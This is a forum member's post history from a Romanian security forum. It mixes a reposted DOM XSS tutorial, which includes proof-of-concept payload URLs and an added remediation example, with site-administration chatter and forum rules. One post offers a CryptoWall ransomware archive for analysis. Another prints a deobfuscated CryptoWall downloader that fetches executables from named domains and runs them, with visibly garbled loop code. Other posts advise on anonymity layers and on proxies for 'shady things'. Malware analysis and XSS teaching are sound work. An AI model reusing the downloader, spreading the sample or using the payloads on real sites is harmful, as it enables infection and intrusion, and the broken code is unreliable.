Nytro

Administrators
  • Posts: 18715
  • Days Won: 701

Everything posted by Nytro

  1. An Introduction to DOM XSS

     Published on February 10, 2016 by HollyGraceful on Web Application Security

     Document Object Model Based Cross-Site Scripting (DOM Based XSS) is a type of Cross-site Scripting where, instead of the payloads being stored or reflected by the remote web server and appearing in the response HTML, the payload is instead stored in the DOM and processed insecurely by JavaScript. For those unfamiliar with what the DOM is, a short and fairly untechnical overview is available here.

     The impact and exploitation of DOM-XSS is essentially the same as reflected or stored; however the detection is a little different, as you can’t simply check the server responses and build up a payload. For example, if you’re using Burp Suite for testing, Burp doesn’t parse or execute JavaScript and therefore it won’t be too much help there. (It will however look for DOM-XSS through static analysis and pick up on issues such as location.hash ending up in document.write.)

     This is the idea of “sinks” and “sources”, where a vulnerability may occur if an attacker is able to control a source and the data retrieved makes it into a sink without filtering, validation or encoding. The data may be processed and changed in the centre as long as a payload can be snuck along too. Essentially we concentrate on areas where user input may find its way into potentially vulnerable functions. It may be useful to remember that Firefox can show the DOM source by highlighting an area of the page and selecting “View Selection Source”. Generally I will manually review JavaScript and try to link between areas of user input and potentially dangerous functions.

     Here I’ll try to demonstrate the concept through a real-world example found on a recent Penetration Test. Hopefully this will highlight the concepts as well as some of the difficulties in finding these issues:

     During a recent Penetration Test I came across an interesting piece of JavaScript which turned out to be vulnerable, so I’ve cleaned it up, anonymised it and present it here as a vulnerable example. In the actual application this was a collection of four functions being loaded from different locations and was a little more complex than what you see here; I’ve simply reduced the complexity so that it doesn’t distract too much from the general idea. The idea here was that I tied a source to a sink and that led to an exploit. The following code is similar to what I found during my Penetration Test:

         1.  <html><body>
         2.  <script>
         3.  function OnLoad() {
         4.      var foundFrag = get_fragment();
         5.      return foundFrag;
         6.  }
         7.
         8.  function get_fragment() {
         9.      var r4c='(.*?)';
         10.     var results = location.hash.match('.*input=token('+r4c+');');
         11.
         12.     if(results){
         13.         return (unescape (results[2]));
         14.     } else {
         15.         return null;
         16.     }
         17. }
         18.
         19. display_session = OnLoad();
         20. document.write("Your session ID was: "+display_session+"<br><br>")</script>
         21. An error occurred...
         22. </body></html>

     First of all I noticed the function document.write() executing with a parameter containing get_fragment(). I traced document.write through display_session to OnLoad(), which executes get_fragment(), which takes input from the URL. In reality that link between user input and vulnerable function was a little more blurry, with some additional processing being done to “results”; however you can see the idea here. Through the application scripts we try to tie together user inputs and vulnerable functions. If we can get unfiltered user input into document.write() we can deface the web application or potentially steal confidential data.

     Location.hash is being used as input to that function, so let’s start there because that’s user input (an attacker could craft a malicious link with a payload in the fragment). For those unfamiliar with JavaScript, the line in question is number 10. It’s taking location.hash, which is the contents of the URL after the “fragment”, that’s after the # at the end of the URL, such as:

     http://gracefulsecurity.com/example?#foobar

     It’s taking the word “foobar” from above and applying a Regular Expression to it. The expression looks for the string “input=token” anywhere in the fragment and reads from that string up to a semi-colon character (that’s what r4c is doing, it’s a capture group that captures any character using the multiple wildcard “.*”). Therefore in this case, if I wanted to execute a simple XSS proof-of-concept such as alert(1), I could place this in the URL fragment after the string input=token but before a semicolon, like this:

     http://gracefulsecurity.com/example?#input=token<script>alert(1)</script>;

     With this, the script would find input=token and read from there up to the semi-colon, then place that input within the document.write function, and the following happens:

     A simple XSS proof-of-concept. Here however you might think that a more complex payload would not be possible, as the application stops reading when it spots a semi-colon and so something as simple as alert(1);alert(2) would not be possible; however, thanks to the use of unescape() on the returned data, I can use a payload like this:

     http://gracefulsecurity.com/example?#input=token<script>alert(1)%3balert(2)</script>;

     Where I am replacing the ; character with its URI encoded equivalent! Now I can write my malicious JavaScript payload and craft a link to send to a victim just like I would with standard reflected cross-site scripting! So all in all, detection and payload generation is usually a little trickier, but the act of exploitation and the impact is just the same!

     Detection is harder because I can’t use a tool like Burp Suite to view the modified responses (as it’s all handled client side by the browser). However, by using tools like Firefox, by using the developer console, or by statically analysing the JavaScript, we can still pick up on these issues simply.

     Remediation

     It’s worth noting that modern browsers have made steps to restrict the exploitability of issues like reflected XSS and DOM-Based XSS. However there are still things that can be done by developers. Generally speaking, HTML Entity encoding non-alphanumeric user input as it is rendered to the browser will effectively block an attacker's ability to execute scripts in the malicious ways described above whilst preserving the functionality of the application. It’s not enough to block keywords such as “script” (and certainly alert!); it is more important to block the characters required to write effective JavaScript, such as: ( ) ; " '

     I build on this idea in more detail within my article about Web Application Defence, which can be found here.

     Source: https://www.gracefulsecurity.com/an-introduction-to-dom-xss/
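As an added example (not part of the article or of the forum post), the article's get_fragment() logic rewritten as a pure function that takes the hash string as a parameter, placed beside the HTML-entity-encoding remediation the article recommends; the names getFragment, htmlEncode, renderSessionUnsafe and renderSessionSafe and the sample hashes are constructed here.

```javascript
// Added example: the vulnerable fragment parser and the encoded sink side by side.
// Assumption: runs under Node.js, where unescape() is available as a global.

// Same regex and unescape() as the vulnerable page: reads from "input=token"
// up to the first ';', then percent-decodes the captured text. The hash is
// passed in (as location.hash would be, leading '#' included) for testability.
function getFragment(hash) {
  var r4c = '(.*?)';
  var results = hash.match('.*input=token(' + r4c + ');');
  if (results) {
    return unescape(results[2]);
  }
  return null;
}

// Remediation from the article: encode every character that is not [A-Za-z0-9]
// as a numeric HTML entity, so "<", ">", "(", ")", ";" and quotes are rendered
// as text and can never be parsed as markup or script by the browser.
function htmlEncode(value) {
  return String(value).replace(/[^A-Za-z0-9]/g, function (ch) {
    return '&#' + ch.charCodeAt(0) + ';';
  });
}

// Vulnerable sink: user-controlled data concatenated raw into markup, as the
// page's document.write() call does.
function renderSessionUnsafe(hash) {
  return 'Your session ID was: ' + getFragment(hash) + '<br><br>';
}

// Hardened sink: identical output shape, but the data is entity-encoded first.
function renderSessionSafe(hash) {
  return 'Your session ID was: ' + htmlEncode(getFragment(hash)) + '<br><br>';
}

// Constructed inputs mirroring the article's walkthrough.
var benignHash = '#input=tokenabc123;';
var encodedSemicolonHash = '#input=token<script>alert(1)%3balert(2)</script>;';

console.log(getFragment(benignHash));                    // abc123
console.log(getFragment(encodedSemicolonHash));          // unescape() restores the ';'
console.log(renderSessionUnsafe(encodedSemicolonHash));  // script tags reach the markup
console.log(renderSessionSafe(encodedSemicolonHash));    // only entities reach the markup
```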
  2. I found it on Twitter: For those who don't know: this is MALWARE (actually RANSOMWARE, or a "virus"). If you don't know what it is, it's not for you. It's for those who want to analyse it. The file is attached. The archive password is "RST". CryptoWall.zip
  3. As a note, it can be deobfuscated very easily. At the end you can see: "this[h91](n49);". It's a function call with a certain parameter. What happens if we print that parameter (n49)? That is, we replace "this[h91]" with "document.write" and:

         var b = "yatrazone.com exquisitecorpse.co.nz.s74023.gridserver.com maineselectrealestate.com".split(" ");
         var ws = WScript.CreateObject("WScript.Shell");
         var fn = ws.ExpandEnvironmentStrings("%TEMP%")+String.fromCharCode(92)+"302988";
         var xo = WScript.CreateObject("MSXML2.XMLHTTP");
         var xa = WScript.CreateObject("ADODB.Stream");
         var ld = 0;
         for (var n=1; n<=3; n++) {
           for (var i=ld; i 1000) {
             dn = 1;
             xa.position = 0;
             xa.saveToFile(fn+n+".exe",2);
             try { ws.Run(fn+n+".exe",1,0); } catch (er) { };
           };
           xa.close();
         };
         if (dn == 1) { ld = i; break; };
         } catch (er) { };
         };
         };

     PS: I think this junk (with WScript.Shell) only works on IE6, IE7 at most.
  4. Nytro

    Fun stuff

    https://www.gofundme.com/w8nvtk7d
  5. Get an AllView.
  6. We'll put several such suggestions to a vote. That way you'll get the impression it's a democracy.
  7. Nytro

    Like vs Rep

    IPBoard makes you choose: Reputation or Like. I think it's actually the same thing.
  8. I don't think you're doing things nasty enough to need to go through very many layers of anonymisation. A VPS/VPN with Tor is enough, I think.
  9. VPN -> Tor -> VPS -> Tor -> VPN repeated 2-3 times! While wearing a mask in a McDonald's and changing your MAC address! Then flee to another city! I don't think I need to add that you'll have to get a new ID card and a few cosmetic surgeries afterwards...
  10. Damn, you figured it out... In case you can't tell on your own which one is me in that picture: I know, I've put on a bit of a belly, stop picking on me
  11. I can't do anything about the old links, they have a different ID... Nothing I can do. Let me see if I can find a mapping between them...
  12. We'll take it into consideration; for now it stays as it is.
  13. Does it do this to you all the time, or only now and then? It may be caused by their chat service. In case you didn't know, chat conversations pass through them. I'll see what I can do about it. But it's possible that's why it doesn't work.
  14. Nytro

    Test

    Can images be posted in chat? I didn't know.
  15. I did. Seriously, I put it on RST. It turned out to be crap. There were a ton of problems, nothing worked, pages took up to 20 seconds to load... It was a mess.
  16. Nytro

    Test

        #include <stdio.h>

        int main() {
            puts("Hello, RST!");
            return 0;
        }

    Looks ok, too bad the indentation is bad.
  17. Nytro

    Test

    Give me some examples. IPB has its own image proxy but it may not work perfectly...
  18. Nytro

    Test

    Does it still show up now? The same thing was happening to me and private messaging didn't work. I removed that plugin and it seems ok
  19. Nytro

    Test

    I don't know anything about that. I hid the links for guests. I had to modify a regular expression in a Russian plugin and translate it
  20. [RO] Terms and conditions
      - The administrators of this website do not take any responsibility for the content of this forum! Each user is responsible for the content they create!
      - The administrators are not responsible for problems arising from the use of the information on this website!
      - The administrators of this website do not take any responsibility for losses resulting from the sale, purchase or exchange of goods or services on this website!
      - We have zero tolerance for fraud or for information that facilitates online or banking fraud, including via private messages (skimming, CCs, roots etc.). Any breach of this rule is punished with a permanent ban from the website, and your data will be handed over to the competent authorities if we are asked to do so. The administrators also reserve the right to ban users from the website following any possible activity that may be linked to online or banking fraud.
      - Publishing illegal or copyright-infringing content is forbidden! It is forbidden to publish personal data, accounts that do not belong to you, access credentials for servers or websites, or anything else that does not belong to you and does not comply with current legislation!
      - This website does not host copyright-infringing files, only links to external services. The administrators of this website take no responsibility for content present on external services. If you hold the copyright for information published on this website, contact one of the administrators to have the content removed.
      - By accessing this website you agree to the terms and conditions and the rules of this website!

      [RO] Warnings, temporary or permanent bans
      Following a breach of this forum's rules, users may be warned (warn) or have their access to the forum suspended (ban) temporarily or permanently. The administrators and moderators of this website decide the penalties for breaking the rules. If you consider a penalty (warn or ban) unjustified, contact one of the administrators of this website.
      Actions for which you will receive a warning (warn):
      - Off-topic - if you deviate from the discussion topic of a thread
      - Double post - do not make several consecutive posts
      - Useless post - do not post just for the sake of posting, only if you have something useful to say
      - Reopening a thread - check the date of the last post in a thread; if nobody has posted for a few years, don't post either
      - Insulting a member - no personal attacks or swearing
      - Inappropriate name - for a thread, choose a title that summarises the post
      - Inappropriate language - follow the rules of grammar, no "sh", "tz" or the like, you are not on IRC
      - Referral links - no adf.ly or other junk
      - Creating a forum account only to ask for invitations to trackers, other forums, etc.
      - Other: any breach that does not fit into these categories
      For multiple warnings the result may be a temporary or permanent ban, as follows:
      - for 3 warnings - 5-day ban
      - for 4 warnings - 30-day ban
      - for 5 warnings - permanent ban

      [RO] Rules
      1. Do not post or ask for roots, VPNs, SMTPs etc.
      2. Give credit and cite the original sources. If you copy a link or a tutorial from another site/forum/blog, give credit to the original author.
      3. Some categories (such as Free Stuff or RST Market) have internal rules. Check whether there is a sticky set of rules before posting in a given category.
      4. Every tutorial, program or similar item must be accompanied by a description in Romanian or English. Links to programs must point to the official site of that program or tutorial.
      5. Publishing the personal data of any individual, or attempting to, results in a permanent ban.
      6. Do not ask for VIP, Moderator or other ranks, because you will not get them. If we need you, we will come looking for you.
      7. A moderator/administrator has the right to kick anyone off the forum, all the more so if they consider that person useless to the forum.
      8. There is a report post button. Do not draw attention through public messages, because you will receive a warning. Alternatively, send that user a private message.
      9. You are not allowed to make projects or presentations in RST's name without the agreement of one of the administrators.
      10. You are not allowed to swear in chat or make personal attacks. Breaking this rule is penalised with a Kick and subsequently a BAN from chat.
      11. Creating more than 1 account per person automatically leads to all the accounts being banned.
      12. Posting vulnerabilities in websites that do not have a bug bounty program and do not offer a legal framework for reporting vulnerabilities is forbidden.
      The RST administrators have the right to modify the Terms and conditions and the Rules of this website at any time without prior notice.

      [RO] Category rules:
      Free stuff
      - Roots, SMTPs, VPSes, RDPs etc. that do not belong to you are not accepted
      - Accounts or access to services that do not belong to you are not accepted
      RST Market
      - Selling, buying or exchanging data that facilitates online or banking fraud is not accepted
      - Selling, buying or exchanging roots, SMTPs, VPSes, RDPs etc. that do not belong to you is not accepted
      - Selling, buying or exchanging accounts that do not belong to you is not accepted

      [EN] Terms and conditions
      - The administrators of this website do not take any responsibility for the content of the website! Each user is responsible for the content they create!
      - The administrators are not responsible for any problem resulting from the use of the information available on this website!
      - The administrators of this website do not take any responsibility for losses resulting from selling, buying or exchanging information on this website!
      - We do not tolerate fraud or any information that facilitates online fraud or banking fraud, including via the private messaging system (skimming, CCs, roots etc.)! Any breach of this rule is punished with a permanent ban from this website, and your personal data will be handed over to the authorities if they request it. Also, the administrators of this forum are allowed to ban users for any activity that can be related to online fraud or banking fraud.
      - It is not permitted to post illegal or copyright-infringing content! It is forbidden to publish private personal data, stolen accounts, access information for websites or services that do not belong to you, or any information that does not respect the legislation!
      - This website does not host copyright-infringing files; it only hosts links to external service providers. The administrators of this website do not take responsibility for the content available on external services. If you are the copyright holder for information provided on the website, please contact one of the administrators to remove the content.
      - By accessing this website you agree to the terms and conditions and the rules of this website!

      [EN] Warnings, temporary and permanent ban reasons
      Not following the forum rules may result in warnings, a temporary ban or a permanent ban on this website. The administrators and the moderators of this website decide the punishment for each breach of the rules. If you consider that the punishment is not correct, please contact one of the administrators of this website.
      You can be warned for the following actions:
      - Off-topic - if you deviate from the thread subject
      - Double post - if you make multiple consecutive posts
      - Useless post - if you post without any reason and the post is not useful to the thread subject
      - Reopen thread - check the last post date on a thread and do not post there if it is very old
      - Insulting a member - do not attack or insult other members
      - Improper name - please use descriptive thread subjects
      - Improper language - you are not on IRC, please be as grammatically correct as possible
      - Referral links - do not post adf.ly or other stupid referral links
      - Creating an account on the forum only to ask for invitations on trackers, other forums, etc.
      - Other - any other breach of the forum rules
      For multiple warnings, the result can be a temporary or permanent ban:
      - for 3 warnings - 5-day ban
      - for 4 warnings - 30-day ban
      - for 5 warnings - permanent ban

      [EN] Rules
      1. Do not post or request roots, VPSes, SMTPs or anything else.
      2. Specify the original sources for your posts when you post a tool or a tutorial from another website.
      3. Some categories (such as Free stuff or RST Market) have internal rules. Follow those rules when you post in those categories.
      4. Each tool or tutorial must contain at least a small description in English or Romanian. Links to programs must be links to the official site of those programs.
      5. Publishing or trying to publish private personal information will result in a permanent ban.
      6. Do not request VIP or Moderator access, you will not get it. If we need you, we will look for you.
      7. A moderator or an administrator has the right to ban anyone on this forum if they consider that the user is useless for the forum.
      8. There is a "Report" button, please use it; do not post to warn other users about their mistake.
      9. You are not allowed to create tools or write articles in the name of RST without the approval of one of the administrators.
      10. You are not allowed to attack or insult other persons on the chat or on the forum.
      11. If you have more than one account you can be banned on all your accounts.
      12. Posting vulnerabilities in websites that do not have a bug bounty program is forbidden.
      RST staff have the right to modify the Terms and conditions and the rules of this forum at any time without notification.

      [EN] Category rules
      Free stuff:
      - It is forbidden to post or request roots, VPSes, SMTPs or anything else that does not belong to you
      - It is forbidden to post accounts for websites or services that do not belong to you
      RST Market:
      - It is forbidden to sell, buy or exchange data that facilitates online fraud or banking fraud
      - It is forbidden to sell, buy or exchange roots, VPSes, SMTPs, RDPs or anything else that does not belong to you
      - It is forbidden to sell, buy or exchange accounts that do not belong to you
  21. Hi, Dell is hiring for several positions. A full list can be found here: https://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/search/3792178
      A few selected jobs:
      - Principal Consultant, Penetration Testing - https://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/principal-consultant-penetration-testing-75285
      - Information Security Risk Management Advisor - https://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/information-security-risk-management-advisor-78526
      - Java Software Development Sr. Analyst - https://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/java-software-development-sr-analyst-80439
      - Java Software Development Advisor - https://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/java-software-development-advisor-79300
      - Senior Security Specialist - https://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/senior-security-specialist-77371
      - Network Security - Firewall Auditor - https://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/network-security-firewall-auditor-75062
      - Junior Linux Admin - https://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/junior-linux-admin-81076
      - Level 2 Technical Support Analyst - https://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/level-2-technical-support-analyst-81957
      - Windows System Administrator - https://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/windows-system-administrator-82417
      - Software Testing Engineer - https://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/software-testing-engineer-82376
      - Software Testing Jr. Engineer - https://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/software-testing-jr-engineer-82386
      - McAfee ESM Security Advisor - https://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/mcafee-esm-security-advisor-81648
      Notes:
      1. The links are referral links; this is the internal recommendation procedure. The advantage is that everything gets sorted out much faster and I can help you with whatever information you need about a particular position.
      2. I don't think remote work is possible, you need to be in Bucharest. There is however the possibility of working from home (now and then), and for certain positions (night shift, for example) perhaps even all the time.
      If you have a question you can send me a PM. // Nytro
  22. Then I think you can use public proxies, just check them beforehand to see that they work.
  23. Hi, what do you want to do with them? If you want to do shady things, you should know they aren't exactly useful, many are honeypots. Search Google for "proxy list" and you'll find tons.
  24. Nytro

    Test

    Done.
  25. The VIP Area was just for show, hardly anything useful was posted there. The only useful thing for VIPs was that Custom Title, and I don't understand why it was so sought after... For now there won't be anything, we'll see as we go.